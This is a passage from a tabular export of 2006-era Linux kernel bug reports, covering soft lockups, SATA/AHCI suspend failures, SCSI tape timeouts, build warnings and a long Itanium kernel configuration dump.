TCPF_SYN_RECV)) and I see that -EPIPE is returned because of this check. I have a test to reproduce this race condion, but the test is under proprietary license (non-distributable). Feel free to ask me to try any patch.</t>
  </si>
  <si>
    <t>2006-03-17 07:55 UTC</t>
  </si>
  <si>
    <t>2007-11-29 08:33 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: Distribution:mandrake 10.2 Hardware Environment: PC x86 Software Environment: Problem Description: After time the harddisk seems to stop and back to life..!! Steps to reproduce: Wait! [23516.607832] BUG: soft lockup detected on CPU#0! [23516.607861] [23516.607872] Pid: 0, comm: swapper [23516.607888] EIP: 0060:[&lt;c0100c91&gt;] CPU: 0 [23516.607915] EIP is at default_idle+0x41/0x80 [23516.607933] EFLAGS: 00000246 Not tainted (2.6.15.6CompiledByYann) [23516.607954] EAX: 00000000 EBX: c0312000 ECX: c799a000 EDX: c0312000 [23516.607972] ESI: 0009ff00 EDI: c030c800 EBP: c0313fb8 DS: 007b ES: 007b [23516.607997] CR0: 8005003b CR2: 080facf4 CR3: 07a4b000 CR4: 000002d0 [23516.608014] [&lt;c0100fbd&gt;] show_regs+0x14d/0x174 [23516.608037] [&lt;c01368e5&gt;] softlockup_tick+0x55/0x60 [23516.608071] [&lt;c012028b&gt;] do_timer+0xcb/0xd0 [23516.608096] [&lt;c010788f&gt;] timer_interrupt+0x2f/0x70 [23516.608133] [&lt;c0136abe&gt;] handle_IRQ_event+0x3e/0x90 [23516.608156] [&lt;c0136b6c&gt;] __do_IRQ+0x5c/0xc0 [23516.608176] [&lt;c01050bc&gt;] do_IRQ+0x1c/0x30 [23516.608196] [&lt;c01035b6&gt;] common_interrupt+0x1a/0x20 [23516.608218] [&lt;c0100d63&gt;] cpu_idle+0x73/0x80 [23516.608237] [&lt;c010024b&gt;] rest_init+0x2b/0x30 [23516.608256] [&lt;c03148bd&gt;] start_kernel+0x17d/0x1c0 [23516.608288] [&lt;c0100199&gt;] 0xc0100199</t>
  </si>
  <si>
    <t>saa7134</t>
  </si>
  <si>
    <t>v4l-dvb_saa7134@kernel-bugs.osdl.org</t>
  </si>
  <si>
    <t>fs/Kconfig: no help text for HUGETLBFS</t>
  </si>
  <si>
    <t>all 2.6</t>
  </si>
  <si>
    <t>2006-03-19 08:31 UTC</t>
  </si>
  <si>
    <t>2006-04-19 09:59 UTC</t>
  </si>
  <si>
    <t>There is no help text for the HUGETLBFS option.</t>
  </si>
  <si>
    <t>2.6.16-rc6</t>
  </si>
  <si>
    <t>SATA hard disk with AHCI mode lost after S3</t>
  </si>
  <si>
    <t>2006-03-21 01:24 UTC</t>
  </si>
  <si>
    <t>Austin Yuan</t>
  </si>
  <si>
    <t>6260 6261</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: N/A Distribution: Redflag 5.0 with 2.6.16-rc6 kernel Hardware Environment: CPU: P4 3.6G MB/Chipset: 945GNTR with on-board Gfx/Audio/Lan (http://www.intel.com/products/motherboard/d945gnt/index.htm) Hard-disk: ST3120026AS, 120G Software Environment: Redflag 5.0 and 2.6.16-rc6 kernel with an AHCI suspend/resume patch from http://marc.theaimsgroup.com/?l=linux-kernel&amp;m=114122220923417&amp;w=2 Problem Description: SATA hard disk with AHCI mode lost after resuming from S3 Steps to reproduce: 1. Set SATA mode in BIOS into AHCI (another two mode is "IDE" and "RAID") 2. Get latest 2.6.16-rc6 kernel and patch it with a patch from http://marc.theaimsgroup.com/?l=linux-kernel&amp;m=114122220923417&amp;w=2 3. Configure the kernel with minimal components (removing module,USB,1394, audio and other unnecessary components support, but including SATA/AHCI, ACPI and network support), build and install it. 4. Boot with the new kernel into console mode (init 3) 5. log into the system from one remote machine by ssh 6. Enter S3 by "echo mem &gt; /sys/power/state", and then press powerbutton to resume (using vbetool to re-post the display) 7. Then display is normal, and ssh session is still living, but hard disk is lost. (there are many error messages like "sd 0:0:0:0: SCSI error: return code = 0x40000")</t>
  </si>
  <si>
    <t>2.6.16.x cause gentoo-linux hang up when services-parallel-startup enabled.</t>
  </si>
  <si>
    <t>2006-03-21 17:07 UTC</t>
  </si>
  <si>
    <t>Nan Wang</t>
  </si>
  <si>
    <t>2006-03-30 02:08 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.16 Distribution: Gentoo Hardware Environment: Acer TravelMate 3001 Celeron-M 1.3G i915G Chipset (HPET_TIMER) 1G memory 40GB samsung IDE (8M cache) Software Environment: udev/coldplug/hotplug/alsa/bash Problem Description: Everytime I turn on PM_TIMER in kernel, my system hangs up when UDEV is starting up(however I can reboot it with CTRL_ALT_DEL), so I have to disable PM_TIMER in kernel. But, since 2.6.16, there is no option for PM_TIMER, and PM_TIMER is automatically turned on, my system hangs up at UDEV stage. Steps to reproduce: compile and install kernel 2.6.16 reboot</t>
  </si>
  <si>
    <t>2.6.16</t>
  </si>
  <si>
    <t>oops in Assertion failed! qc != NULL,drivers/scsi/libata-core.c,ata_pio_block,line=3216</t>
  </si>
  <si>
    <t>Linux version 2.6.15-gentoo-r7 (root@localhost) (gcc version 3.4</t>
  </si>
  <si>
    <t>2006-03-22 16:18 UTC</t>
  </si>
  <si>
    <t>2007-07-09 11:26 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: Still happens. Distribution: Linux version 2.6.15-gentoo-r7 (root@localhost) (gcc version 3.4.5 (Gentoo 3.4.5-r1, ssp-3.4.5-1.0, pie-8.7.9)) #1 SMP PREEMPT Tue Mar 14 23:04:58 GMT 2006 Hardware Environment: Pentium 4 Software Environment: Linux 2.6.15-gentoo-r7 Problem Description: After using hdparm -S60 /dev/sda on a SATA disk, the drive will eventually go to sleep. When one goes to wake it up, it sometimes works, and sometimes does not. When it fails, one gets an oops see attachment for extract from kern.log (dmesg) Steps to reproduce: hdparm -S60 /dev/sda wait for the HD to go to sleep. Try to access the HD. Repeat until failure.</t>
  </si>
  <si>
    <t>qla1280 times out on long operations such as tape rewind</t>
  </si>
  <si>
    <t>2006-03-23 06:34 UTC</t>
  </si>
  <si>
    <t>2006-12-03 04:42 UTC</t>
  </si>
  <si>
    <t>Jes Sorensen</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: unknown Distribution:Fedora Core 3 Hardware Environment:Intel Pentium III S, QLogic QLA12160 PCI to SCSI Host Adapter, Dell PowerVault 110T Ultrium Software Environment: Problem Description: When performing long scsi operations, such as tape rewinds or seeks, the command fails. Sample syslog entry: Mar 19 21:48:40 sibyl kernel: scsi(0): Resetting Cmnd=0xe850bce0, Handle=0x00000002, action=0x0 Mar 19 21:48:40 sibyl kernel: qla1280_mailbox_command: Command failed, mailbox0 = 0x0015, mailbox_out0 = 0x4005, istatus = 0x6000 Mar 19 21:48:40 sibyl kernel: m0 4005, m1 8600, m2 0000, m3 0001 Mar 19 21:48:40 sibyl kernel: m4 00f9, m5 0006, m6 0000, m7 0000 Mar 19 21:48:40 sibyl kernel: scsi(0:1:6:0): Unable to abort command! Mar 19 21:48:40 sibyl kernel: scsi(0): Resetting Cmnd=0xe850bce0, Handle=0x00000002, action=0x2 Mar 19 21:48:40 sibyl kernel: scsi(0:1:6:0): Queueing device reset command. Mar 19 21:48:53 sibyl kernel: scsi(0): Resetting Cmnd=0xe850bce0, Handle=0x00000001, action=0x0 Mar 19 21:48:57 sibyl kernel: scsi(0): Resetting Cmnd=0xe850bce0, Handle=0x00000001, action=0x3 Mar 19 21:48:57 sibyl kernel: qla1280(0:1): Issuing BUS DEVICE RESET Steps to reproduce: 1. Create a tape with lots of data. There needs to be enough so that a rewind or a seek will take more than 30seconds. 2. Seek to end of tape. I used "mt fsf 5" (because I had 5 partitions dumped to the tape) but "mt eod" might do. Note the the tape appears to seek correctly, but the command fails. Seeking one tape file at a time ("mt fsf 1") works for me but that presumably depends on the size of the tape file. "mt rewind" from the end of the tape fails in a similar way to a long seek. Examine syslog.</t>
  </si>
  <si>
    <t>Petros Koutoupis</t>
  </si>
  <si>
    <t>linux-scsi@vger.kernel.org</t>
  </si>
  <si>
    <t>wireless printing produces multiple beeps and display flickers</t>
  </si>
  <si>
    <t>2006-03-27 13:18 UTC</t>
  </si>
  <si>
    <t>2006-07-07 07:12 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: Was running a modified DSDT for a long time, and I regularly noticed it there (at least since 2.6.14 but I don't remember if before that). But I recently noticed it with a vanilla DSDT. Distribution: Debian testing/unstable Hardware Environment: TP 600X, prism54 wireless PCMCIA card (Intersil2), printer is an HP PSC 2710 inkjet printer/fax/scanner. Software Environment: vanilla DSDT (BIOS 1.11), lprng 3.8.24-4, hpijs 2.1.7, gs 8.53 Problem Description: If I print (using gs+hpijs+lpr) over the wireless network when on battery power, sometimes the system beeps repeatedly while the data is being transferred (and maybe a bit longer) as if the AC power was being plugged and unplugged repeatedly. The display also dims and brightens, also as if AC power was being plugged and unplugged. It never affects the printing (i.e. the files transfer and print fine). Here is the wireless card info (prism54 module), from lspci: 0000:06:00.0 Network controller: Intersil Corporation Intersil ISL3890 [Prism GT/Prism Duette] (rev 01) I noticed the same problem a few times with USB printing, but never when printing via the parallel port. Steps to reproduce: With the vanilla DSDT I can't reliably reproduce it, but it's happened twice now, and one time I had lots of ACPI debugging turned on. I will attach those dmesgs.</t>
  </si>
  <si>
    <t>Time stops on IBM Netvista 8317</t>
  </si>
  <si>
    <t>2006-03-28 05:28 UTC</t>
  </si>
  <si>
    <t>Andy Duplain</t>
  </si>
  <si>
    <t>2010-01-05 00:57 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.15 (with correcting patches) Distribution: Debian Etch Hardware Environment: IBM Netvista 8317 Software Environment: Linux 2.6.16 Problem Description: Time slows down and stops when using TSC timesource. Steps to reproduce: Boot vanilla kernel 2.6.16 Wait 12-24 hours. Note time difference from actual time.</t>
  </si>
  <si>
    <t>'strlen' exported twice</t>
  </si>
  <si>
    <t>2.6.16-git15</t>
  </si>
  <si>
    <t>2006-03-28 12:15 UTC</t>
  </si>
  <si>
    <t>Pavel Vasilyev</t>
  </si>
  <si>
    <t>2006-04-23 08:04 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: Distribution: SuSE Linux 10.0 Hardware Environment: 2 x AMD Opteron 265/4GbRAM Software Environment: x86_64-gnu-linux/gcc-4.0.2/glibc-2.3.5 Problem Description: Kernel Compile Warning: Steps to reproduce: tar -xvjf linux-2.6.16.tar.bz2 ln -s a linux-2.6.16 &amp;&amp; ln -s b a bzip2 -cd patch-2.6.16-git15.bz2 | patch -p0 cd linux-2.6.16 make menuconfig make ... GZIP arch/x86_64/boot/compressed/vmlinux.bin.gz LD arch/x86_64/boot/compressed/piggy.o LD arch/x86_64/boot/compressed/vmlinux HOSTCC arch/x86_64/boot/tools/build LD arch/x86_64/boot/bootsect LD arch/x86_64/boot/setup OBJCOPY arch/x86_64/boot/vmlinux.bin BUILD arch/x86_64/boot/bzImage Root device is (8, 2) Boot sector 512 bytes. Setup is 6979 bytes. System is 2229 kB Kernel: arch/x86_64/boot/bzImage is ready (#3) Building modules, stage 2. MODPOST WARNING: vmlinux: 'strlen' exported twice. Previous export was in vmlinux WARNING: net/ipv4/netfilter/ip_conntrack.o - Section mismatch: reference to .init.text:ip_conntrack_init from .text between 'init_or_cleanup' (at offset 0x93a) and '__hash_conntrack' WARNING: net/ipv4/netfilter/iptable_nat.o - Section mismatch: reference to .init.text:ip_nat_rule_init from .text between 'init_or_cleanup' (at offset 0x3d0) and 'nat_decode_session' ...</t>
  </si>
  <si>
    <t>vesafb boot tux on acid!</t>
  </si>
  <si>
    <t>2.6.17-rc0-git16</t>
  </si>
  <si>
    <t>2006-03-29 07:50 UTC</t>
  </si>
  <si>
    <t>2006-04-20 13:33 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.15 Distribution: FC5 Hardware Environment: [root@localhost ~]# lspci 00:00.0 Host bridge: VIA Technologies, Inc. K8T800Pro Host Bridge 00:00.1 Host bridge: VIA Technologies, Inc. K8T800Pro Host Bridge 00:00.2 Host bridge: VIA Technologies, Inc. K8T800Pro Host Bridge 00:00.3 Host bridge: VIA Technologies, Inc. K8T800Pro Host Bridge 00:00.4 Host bridge: VIA Technologies, Inc. K8T800Pro Host Bridge 00:00.7 Host bridge: VIA Technologies, Inc. K8T800Pro Host Bridge 00:01.0 PCI bridge: VIA Technologies, Inc. VT8237 PCI bridge [K8T800/K8T890 South] 00:07.0 FireWire (IEEE 1394): VIA Technologies, Inc. IEEE 1394 Host Controller (rev 80) 00:0a.0 Ethernet controller: Marvell Technology Group Ltd. 88E8001 Gigabit Ethernet Controller (rev 13) 00:0d.0 Ethernet controller: Intel Corporation 82557/8/9 [Ethernet Pro 100] (rev 01) 00:0f.0 RAID bus controller: VIA Technologies, Inc. VIA VT6420 SATA RAID Controller (rev 80) 00:0f.1 IDE interface: VIA Technologies, Inc. VT82C586A/B/VT82C686/A/B/VT823x/A/C PIPC Bus Master IDE (rev 06) 00:10.0 USB Controller: VIA Technologies, Inc. VT82xxxxx UHCI USB 1.1 Controller (rev 81) 00:10.1 USB Controller: VIA Technologies, Inc. VT82xxxxx UHCI USB 1.1 Controller (rev 81) 00:10.2 USB Controller: VIA Technologies, Inc. VT82xxxxx UHCI USB 1.1 Controller (rev 81) 00:10.3 USB Controller: VIA Technologies, Inc. VT82xxxxx UHCI USB 1.1 Controller (rev 81) 00:10.4 USB Controller: VIA Technologies, Inc. USB 2.0 (rev 86) 00:11.0 ISA bridge: VIA Technologies, Inc. VT8237 ISA bridge [KT600/K8T800/K8T890 South] 00:11.5 Multimedia audio controller: VIA Technologies, Inc. VT8233/A/8235/8237 AC97 Audio Controller (rev 60) 00:11.6 Communication controller: VIA Technologies, Inc. AC'97 Modem Controller (rev 80) 00:18.0 Host bridge: Advanced Micro Devices [AMD] K8 [Athlon64/Opteron] HyperTransport Technology Configuration 00:18.1 Host bridge: Advanced Micro Devices [AMD] K8 [Athlon64/Opteron] Address Map 00:18.2 Host bridge: Advanced Micro Devices [AMD] K8 [Athlon64/Opteron] DRAM Controller 00:18.3 Host bridge: Advanced Micro Devices [AMD] K8 [Athlon64/Opteron] Miscellaneous Control 01:00.0 VGA compatible controller: nVidia Corporation NV40 [GeForce 6800] (rev a1) Software Environment: GCC 4.1, KDE, Xorg 7.0 Problem Description: The colors of the picture of the two penguins at boot time are wrong... Tux is on acid! Steps to reproduce: Every boot using vga=0x305</t>
  </si>
  <si>
    <t>2011-07-30 05:22 UTC</t>
  </si>
  <si>
    <t>input_device_id is not protected with __KERNEL__ in linux/input.h</t>
  </si>
  <si>
    <t>2006-03-29 10:34 UTC</t>
  </si>
  <si>
    <t>2006-05-12 13:24 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.14, maybe 2.6.15 Distribution: Slackware 10.2 Hardware Environment: Athlon Software Environment: GCC 3.4.6 / glibc 2.3.4 Problem Description: It seems that linux/input.h defines structure input_device_id, which in turns use kernel_ulong_t, outside of __KERNEL__ block (thus, it is visible from userspace). But this kernel_ulong_t is only visible from Kernel, since it is definied in linux/mod_devicetable.h, which is not included if __KERNEL__ is not defined. This prevents kdebase from KDE 3.5.2 to build. Steps to reproduce: tar xjf kdebase-3.5.2-tar.bz2 cd kdebase-3.5.2 ./configure make doesn't build, due to joystick.h including buggy input.h.</t>
  </si>
  <si>
    <t>2.6.16.1</t>
  </si>
  <si>
    <t>kernel/built-in.o:(.data+0xd10): undefined reference to `uevent_helper'</t>
  </si>
  <si>
    <t>2.6.16-git6 onwards</t>
  </si>
  <si>
    <t>2006-03-30 04:22 UTC</t>
  </si>
  <si>
    <t>2006-06-05 08:42 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.16ish Distribution: Hardware Environment: Software Environment: Building an ARM kernel using h7201_defconfig configuration Problem Description: LD .tmp_vmlinux1 kernel/built-in.o:(.data+0xd1c): undefined reference to `uevent_helper' make: *** [.tmp_vmlinux1] Error 1 make: Leaving directory `/var/tmp/kernel-orig' Steps to reproduce: Compile a kernel with CONFIG_HOTPLUG but without CONFIG_NET</t>
  </si>
  <si>
    <t>Bug hwclock in kernel 2.6.16</t>
  </si>
  <si>
    <t>2006-03-30 05:32 UTC</t>
  </si>
  <si>
    <t>Sergey</t>
  </si>
  <si>
    <t>2008-03-20 00:44 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: Kernel 2.6.8-2-itanium-smp (Defauld in Debian 3.1) Distribution: Hardware Environment: IBM xSeries 455 (Itanium 2) Software Environment:Debian 3.1 Problem Description: running hwclock --hctosys or ntpdate $ip_addr_ntp_server hangup the kernel. My kernel config: # Automatically generated make config: don't edit # # # Code maturity level options # CONFIG_EXPERIMENTAL=y CONFIG_CLEAN_COMPILE=y # # General setup # CONFIG_SWAP=y CONFIG_SYSVIPC=y CONFIG_POSIX_MQUEUE=y CONFIG_BSD_PROCESS_ACCT=y # CONFIG_BSD_PROCESS_ACCT_V3 is not set CONFIG_SYSCTL=y # CONFIG_AUDIT is not set CONFIG_LOG_BUF_SHIFT=16 CONFIG_HOTPLUG=y CONFIG_IKCONFIG=y CONFIG_IKCONFIG_PROC=y # CONFIG_EMBEDDED is not set CONFIG_KALLSYMS=y # CONFIG_KALLSYMS_ALL is not set # CONFIG_KALLSYMS_EXTRA_PASS is not set CONFIG_FUTEX=y CONFIG_EPOLL=y CONFIG_IOSCHED_NOOP=y CONFIG_IOSCHED_AS=y CONFIG_IOSCHED_DEADLINE=y CONFIG_IOSCHED_CFQ=y # CONFIG_CC_OPTIMIZE_FOR_SIZE is not set # # Loadable module support # CONFIG_MODULES=y CONFIG_MODULE_UNLOAD=y # CONFIG_MODULE_FORCE_UNLOAD is not set CONFIG_OBSOLETE_MODPARM=y CONFIG_MODVERSIONS=y CONFIG_KMOD=y CONFIG_STOP_MACHINE=y # # Processor type and features # CONFIG_IA64=y CONFIG_64BIT=y CONFIG_MMU=y CONFIG_RWSEM_XCHGADD_ALGORITHM=y CONFIG_TIME_INTERPOLATION=y CONFIG_EFI=y CONFIG_IA64_GENERIC=y # CONFIG_IA64_DIG is not set # CONFIG_IA64_HP_ZX1 is not set # CONFIG_IA64_SGI_SN2 is not set # CONFIG_IA64_HP_SIM is not set CONFIG_ITANIUM=y # CONFIG_MCKINLEY is not set # CONFIG_IA64_PAGE_SIZE_4KB is not set # CONFIG_IA64_PAGE_SIZE_8KB is not set CONFIG_IA64_PAGE_SIZE_16KB=y # CONFIG_IA64_PAGE_SIZE_64KB is not set CONFIG_IA64_BRL_EMU=y # CONFIG_ITANIUM_BSTEP_SPECIFIC is not set CONFIG_IA64_L1_CACHE_SHIFT=6 CONFIG_NUMA=y CONFIG_VIRTUAL_MEM_MAP=y CONFIG_DISCONTIGMEM=y # CONFIG_IA64_CYCLONE is not set CONFIG_IOSAPIC=y CONFIG_FORCE_MAX_ZONEORDER=18 CONFIG_SMP=y CONFIG_NR_CPUS=64 CONFIG_HOTPLUG_CPU=y CONFIG_PREEMPT=y CONFIG_HAVE_DEC_LOCK=y CONFIG_IA32_SUPPORT=y CONFIG_COMPAT=y CONFIG_PERFMON=y CONFIG_IA64_PALINFO=m # # Firmware Drivers # CONFIG_EFI_VARS=m CONFIG_EFI_PCDP=y CONFIG_BINFMT_ELF=y CONFIG_BINFMT_MISC=m # # Power management and ACPI # CONFIG_PM=y CONFIG_ACPI=y # # ACPI (Advanced Configuration and Power Interface) Support # CONFIG_ACPI_BOOT=y CONFIG_ACPI_INTERPRETER=y CONFIG_ACPI_BUTTON=m CONFIG_ACPI_FAN=m CONFIG_ACPI_PROCESSOR=m CONFIG_ACPI_THERMAL=m CONFIG_ACPI_NUMA=y # CONFIG_ACPI_DEBUG is not set CONFIG_ACPI_BUS=y CONFIG_ACPI_POWER=y CONFIG_ACPI_PCI=y CONFIG_ACPI_SYSTEM=y # # Bus options (PCI, PCMCIA) # CONFIG_PCI=y CONFIG_PCI_DOMAINS=y CONFIG_PCI_MSI=y # CONFIG_PCI_LEGACY_PROC is not set CONFIG_PCI_NAMES=y # # PCI Hotplug Support # CONFIG_HOTPLUG_PCI=m CONFIG_HOTPLUG_PCI_FAKE=m CONFIG_HOTPLUG_PCI_ACPI=m CONFIG_HOTPLUG_PCI_CPCI=y CONFIG_HOTPLUG_PCI_PCIE=m # CONFIG_HOTPLUG_PCI_PCIE_POLL_EVENT_MODE is not set CONFIG_HOTPLUG_PCI_SHPC=m # CONFIG_HOTPLUG_PCI_SHPC_POLL_EVENT_MODE is not set # # PCMCIA/CardBus support # CONFIG_PCMCIA=m # CONFIG_PCMCIA_DEBUG is not set CONFIG_YENTA=m CONFIG_CARDBUS=y CONFIG_PD6729=m CONFIG_I82092=m CONFIG_TCIC=m # # Device Drivers # # # Generic Driver Options # CONFIG_STANDALONE=y CONFIG_PREVENT_FIRMWARE_BUILD=y CONFIG_FW_LOADER=m # CONFIG_DEBUG_DRIVER is not set # # Memory Technology Devices (MTD) # CONFIG_MTD=m # CONFIG_MTD_DEBUG is not set CONFIG_MTD_PARTITIONS=y CONFIG_MTD_CONCAT=m CONFIG_MTD_REDBOOT_PARTS=m # CONFIG_MTD_REDBOOT_PARTS_UNALLOCATED is not set # CONFIG_MTD_REDBOOT_PARTS_READONLY is not set # CONFIG_MTD_CMDLINE_PARTS is not set # # User Modules And Translation Layers # CONFIG_MTD_CHAR=m CONFIG_MTD_BLOCK=m CONFIG_MTD_BLOCK_RO=m CONFIG_FTL=m CONFIG_NFTL=m CONFIG_NFTL_RW=y CONFIG_INFTL=m # # RAM/ROM/Flash chip drivers # CONFIG_MTD_CFI=m CONFIG_MTD_JEDECPROBE=m CONFIG_MTD_GEN_PROBE=m # CONFIG_MTD_CFI_ADV_OPTIONS is not set CONFIG_MTD_MAP_BANK_WIDTH_1=y CONFIG_MTD_MAP_BANK_WIDTH_2=y CONFIG_MTD_MAP_BANK_WIDTH_4=y # CONFIG_MTD_MAP_BANK_WIDTH_8 is not set # CONFIG_MTD_MAP_BANK_WIDTH_16 is not set # CONFIG_MTD_MAP_BANK_WIDTH_32 is not set CONFIG_MTD_CFI_I1=y CONFIG_MTD_CFI_I2=y # CONFIG_MTD_CFI_I4 is not set # CONFIG_MTD_CFI_I8 is not set CONFIG_MTD_CFI_INTELEXT=m CONFIG_MTD_CFI_AMDSTD=m CONFIG_MTD_CFI_AMDSTD_RETRY=0 CONFIG_MTD_CFI_STAA=m CONFIG_MTD_CFI_UTIL=m CONFIG_MTD_RAM=m CONFIG_MTD_ROM=m CONFIG_MTD_ABSENT=m # # Mapping drivers for chip access # CONFIG_MTD_COMPLEX_MAPPINGS=y CONFIG_MTD_PHYSMAP=m CONFIG_MTD_PHYSMAP_START=0x8000000 CONFIG_MTD_PHYSMAP_LEN=0x4000000 CONFIG_MTD_PHYSMAP_BANKWIDTH=2 CONFIG_MTD_PCI=m # # Self-contained MTD device drivers # CONFIG_MTD_PMC551=m # CONFIG_MTD_PMC551_BUGFIX is not set # CONFIG_MTD_PMC551_DEBUG is not set CONFIG_MTD_SLRAM=m CONFIG_MTD_PHRAM=m CONFIG_MTD_MTDRAM=m CONFIG_MTDRAM_TOTAL_SIZE=4096 CONFIG_MTDRAM_ERASE_SIZE=128 CONFIG_MTD_BLKMTD=m # # Disk-On-Chip Device Drivers # CONFIG_MTD_DOC2000=m CONFIG_MTD_DOC2001=m CONFIG_MTD_DOC2001PLUS=m CONFIG_MTD_DOCPROBE=m CONFIG_MTD_DOCECC=m # CONFIG_MTD_DOCPROBE_ADVANCED is not set CONFIG_MTD_DOCPROBE_ADDRESS=0 # # NAND Flash Device Drivers # CONFIG_MTD_NAND=m # CONFIG_MTD_NAND_VERIFY_WRITE is not set CONFIG_MTD_NAND_IDS=m CONFIG_MTD_NAND_DISKONCHIP=m # CONFIG_MTD_NAND_DISKONCHIP_PROBE_ADVANCED is not set CONFIG_MTD_NAND_DISKONCHIP_PROBE_ADDRESS=0 # CONFIG_MTD_NAND_DISKONCHIP_BBTWRITE is not set # # Parallel port support # CONFIG_PARPORT=m CONFIG_PARPORT_PC=m CONFIG_PARPORT_PC_CML1=m CONFIG_PARPORT_SERIAL=m # CONFIG_PARPORT_PC_FIFO is not set # CONFIG_PARPORT_PC_SUPERIO is not set # CONFIG_PARPORT_PC_PCMCIA is not set # CONFIG_PARPORT_OTHER is not set CONFIG_PARPORT_1284=y # # Plug and Play support # # # Block devices # CONFIG_PARIDE=m CONFIG_PARIDE_PARPORT=m # # Parallel IDE high-level drivers # CONFIG_PARIDE_PD=m CONFIG_PARIDE_PCD=m CONFIG_PARIDE_PF=m CONFIG_PARIDE_PT=m CONFIG_PARIDE_PG=m # # Parallel IDE protocol modules # CONFIG_PARIDE_ATEN=m CONFIG_PARIDE_BPCK=m CONFIG_PARIDE_COMM=m CONFIG_PARIDE_DSTR=m CONFIG_PARIDE_FIT2=m CONFIG_PARIDE_FIT3=m CONFIG_PARIDE_EPAT=m CONFIG_PARIDE_EPATC8=y CONFIG_PARIDE_EPIA=m CONFIG_PARIDE_FRIQ=m CONFIG_PARIDE_FRPW=m CONFIG_PARIDE_KBIC=m CONFIG_PARIDE_KTTI=m CONFIG_PARIDE_ON20=m CONFIG_PARIDE_ON26=m CONFIG_BLK_CPQ_DA=m CONFIG_BLK_CPQ_CISS_DA=m CONFIG_CISS_SCSI_TAPE=y CONFIG_BLK_DEV_DAC960=m CONFIG_BLK_DEV_UMEM=m CONFIG_BLK_DEV_LOOP=m CONFIG_BLK_DEV_CRYPTOLOOP=m CONFIG_BLK_DEV_NBD=m CONFIG_BLK_DEV_SX8=m CONFIG_BLK_DEV_RAM=y CONFIG_BLK_DEV_RAM_SIZE=32768 CONFIG_BLK_DEV_INITRD=y # # ATA/ATAPI/MFM/RLL support # CONFIG_IDE=m CONFIG_BLK_DEV_IDE=m # # Please see Documentation/ide.txt for help/info on IDE drives # # CONFIG_BLK_DEV_IDE_SATA is not set CONFIG_BLK_DEV_IDEDISK=m # CONFIG_IDEDISK_MULTI_MODE is not set # CONFIG_BLK_DEV_IDECS is not set CONFIG_BLK_DEV_IDECD=m CONFIG_BLK_DEV_IDETAPE=m CONFIG_BLK_DEV_IDEFLOPPY=m CONFIG_BLK_DEV_IDESCSI=m CONFIG_IDE_TASK_IOCTL=y CONFIG_IDE_TASKFILE_IO=y # # IDE chipset support/bugfixes # CONFIG_IDE_GENERIC=m CONFIG_BLK_DEV_IDEPCI=y CONFIG_IDEPCI_SHARE_IRQ=y # CONFIG_BLK_DEV_OFFBOARD is not set CONFIG_BLK_DEV_GENERIC=m CONFIG_BLK_DEV_OPTI621=m CONFIG_BLK_DEV_IDEDMA_PCI=y # CONFIG_BLK_DEV_IDEDMA_FORCED is not set CONFIG_IDEDMA_PCI_AUTO=y # CONFIG_IDEDMA_ONLYDISK is not set CONFIG_BLK_DEV_ADMA=y CONFIG_BLK_DEV_AEC62XX=m CONFIG_BLK_DEV_ALI15X3=m CONFIG_WDC_ALI15X3=y CONFIG_BLK_DEV_AMD74XX=m CONFIG_BLK_DEV_CMD64X=m CONFIG_BLK_DEV_TRIFLEX=m CONFIG_BLK_DEV_CY82C693=m CONFIG_BLK_DEV_CS5520=m CONFIG_BLK_DEV_CS5530=m CONFIG_BLK_DEV_HPT34X=m # CONFIG_HPT34X_AUTODMA is not set CONFIG_BLK_DEV_HPT366=m CONFIG_BLK_DEV_SC1200=m CONFIG_BLK_DEV_PIIX=m CONFIG_BLK_DEV_NS87415=m CONFIG_BLK_DEV_PDC202XX_OLD=m # CONFIG_PDC202XX_BURST is not set CONFIG_BLK_DEV_PDC202XX_NEW=m # CONFIG_PDC202XX_FORCE is not set CONFIG_BLK_DEV_SVWKS=m CONFIG_BLK_DEV_SGIIOC4=m CONFIG_BLK_DEV_SIIMAGE=m CONFIG_BLK_DEV_SLC90E66=m CONFIG_BLK_DEV_TRM290=m CONFIG_BLK_DEV_VIA82CXXX=m # CONFIG_IDE_ARM is not set CONFIG_BLK_DEV_IDEDMA=y # CONFIG_IDEDMA_IVB is not set CONFIG_IDEDMA_AUTO=y # CONFIG_BLK_DEV_HD is not set # # SCSI device support # CONFIG_SCSI=m CONFIG_SCSI_PROC_FS=y # # SCSI support type (disk, tape, CD-ROM) # CONFIG_BLK_DEV_SD=m CONFIG_CHR_DEV_ST=m CONFIG_CHR_DEV_OSST=m CONFIG_BLK_DEV_SR=m CONFIG_BLK_DEV_SR_VENDOR=y CONFIG_CHR_DEV_SG=m CONFIG_CHR_DEV_SCH=m # # Some SCSI devices (e.g. CD jukebox) support multiple LUNs # CONFIG_SCSI_MULTI_LUN=y CONFIG_SCSI_CONSTANTS=y CONFIG_SCSI_LOGGING=y # # SCSI Transport Attributes # CONFIG_SCSI_SPI_ATTRS=m CONFIG_SCSI_FC_ATTRS=m # # SCSI low-level drivers # CONFIG_BLK_DEV_3W_XXXX_RAID=m CONFIG_SCSI_3W_9XXX=m CONFIG_SCSI_ACARD=m CONFIG_SCSI_AACRAID=m CONFIG_SCSI_AIC7XXX=m CONFIG_AIC7XXX_CMDS_PER_DEVICE=253 CONFIG_AIC7XXX_RESET_DELAY_MS=15000 # CONFIG_AIC7XXX_DEBUG_ENABLE is not set CONFIG_AIC7XXX_DEBUG_MASK=0 # CONFIG_AIC7XXX_REG_PRETTY_PRINT is not set CONFIG_SCSI_AIC7XXX_OLD=m CONFIG_SCSI_AIC79XX=m CONFIG_AIC79XX_CMDS_PER_DEVICE=32 CONFIG_AIC79XX_RESET_DELAY_MS=15000 # CONFIG_AIC79XX_ENABLE_RD_STRM is not set # CONFIG_AIC79XX_DEBUG_ENABLE is not set 